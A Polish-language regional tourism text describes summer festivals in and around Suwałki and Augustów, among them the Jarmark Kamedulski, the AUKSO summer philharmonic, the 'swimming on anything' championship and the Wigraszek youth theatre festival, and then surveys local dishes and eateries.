JARMARK KAMEDULSKI – Prezydent Suwałk corocznie zaprasza wszystkich suwalczan i pozostałych gości na dwudniowe święto miasta w sierpniu. Dni Suwałk -„Jarmark Kamedulski” nawiązują do pierwszych jarmarków, organizowanych przez założycieli Suwałk, czyli kamedułów. W programie są przewidziane atrakcje dla rodzin – barwny korowód, widowiska plenerowe ukazujące historię naszego miasta, występy suwalskich gości i zespołów muzycznych oraz konkursy i zabawy dla najmłodszych uczestników. Zgodnie z tradycją w parku Konstytucji 3 Maja rozstawią się stoiska z rękodziełem i suwalskim jadłem. Będzie można skosztować “rożków Rocha”, “bułeczek kamedułek” i “rożków pustelniczych”. Po mieście będzie jeździła kolejka “Pogodnych Suwałk”.

XVI LETNIA FILHARMONIA AUKSO – W trakcie XVI Letniej Filharmonii AUKSO – W Wigrach i Suwalskim Ośrodku Kultury będzie można posłuchać fantastycznych koncertów oraz spotkać się z wyjątkowymi artystami. „XVI LETNIA FILHARMONIA AUKSO” to festiwal o szerokim spektrum kulturowym i artystycznym, odbywający się od kilkunastu lat na Suwalszczyźnie.

PŁYWANIE NA BYLE CZYM W AUGUSTOWIE – „Co ma pływać nie Utonie” Mistrzostwa Polski w Augustowie w Pływaniu na Byle Czym. Pływanie na byle czym to impreza organizowana corocznie od 1995 roku w Augustowie. Za miejsce przeprowadzenia tego konkursu wybrano  Kanał Augustowski nad Nettą. Pływanie na byle czym polega na zbudowaniu czegoś, co nie utonie, tylko utrzyma się na wodzie, ale będzie oryginalnie wyglądać i zaprezentowaniu go przed komisją. To nieziemsko interesujące i radosne przedstawienie na wodzie przyciąga do Augustowa tłumy fanów, corocznie odwiedzających tą imprezę. Tylu ludzi nie spotkamy tutaj w żaden inny dzień w sezonie wakacyjnym. Korzystając z tego faktu organizowane są także koncerty, którym patronuje “Studio Lato Radia Białystok”, więc atrakcji w ten dzień w Augustowie jest całe mnóstwo, a na koniec dnia możemy liczyć na najdłużej wyczekiwany występ gwiazdy wieczoru. Są także organizowane kilkunastominutowe pokazy sztucznych ogni.

WIGRASZEK – od ponad dziesięciu lat współtworzy kulturalny wizerunek naszego miasta. Jest imprezą popularyzującą młodzieżowy i dziecięcy ruch teatralny. Stwarza odbiorcom możliwość skonfrontowania ich dotychczasowych działań artystycznych, wymiany doświadczeń z warsztatów, sprzyja integracji młodszego pokolenia artystycznego i przybliża mieszkańcom naszego miasta, oddalonego od istotnych centrów kulturalnych, szanse ujrzenia wartościowych, godnych dostrzeżenia dokonań teatralnych uczestników.

Tradycją festiwalu są spotkania spektakle, spotkania kulturalno-edukacyjne związane z legendami i historią naszego regionu, organizowane w plenerach urokliwej Suwalszczyzny. Uczestnicy za każdym razem są przygotowani do odbioru i samodzielnego uczestnictwa w zaaranżowanej historii dotyczącej miejsc szczególnych na pograniczu polsko-litewsko-białoruskim. Spotkania te stanowią doskonałą okazję do zacieśnienia kontaktów i nowych znajomości, jednocześnie doskonałą okazję do otwarcia „pudełka zwanego wyobraźnią” i wznowienia pamięci o historii, której jesteśmy częścią. Przewidziane są występy taneczne.

Przysmaki kuchni regionalnej na Suwalszczyźnie

W bardzo wielu miejscach na Suwalszczyźnie można zjeść przysmaki wyrabiane z własnych produktów według tradycyjnych przepisów. Należą do nich typowe dla pogranicza polsko-litewskiego kartacze (ciasto z ziemniaków gotowane z farszem z mięsa), kiszka ziemniaczana, tradycyjne placki ziemniaczane, soczewiaki,  liczne dania rybne np.(lin w śmietanie, pieczony pstrąg, węgorz na zimno, sielawa).

W sezonie letnim warto spróbować pierogów z czarnych jagód lub będąc na spływie kajakowym koniecznie trzeba spróbować  jagodzianek serwowanych na pomostach przez miejscowe gospodynie. Dużą popularnością oraz wykwintnym smakiem cieszy się zupa z kurek. W wielu domach gospodynie wypiekają swój chleb na naturalnym zakwasie, pieką babki ziemniaczane – ciasto z dużej ilości ziemniaków z przyprawami), bliny litewskie (placki ziemniaczane faszerowane mięsem z kwaśną śmietaną), natomiast na słodko gospodynie proponują mrowisko oraz sękacze. Na Suwalszczyźnie jest bardzo wiele restauracji, kawiarni, pubów oraz karczm, które oferują dania suwalskiej kuchni regionalnej w atrakcyjnych cenach (np. Hotel nad Wigrami w Gawrych Rudzie, Gościniec w Krzywym, Gospoda pod Sieją w Starym Folwarku, liczne bary i restauracje w Suwałkach).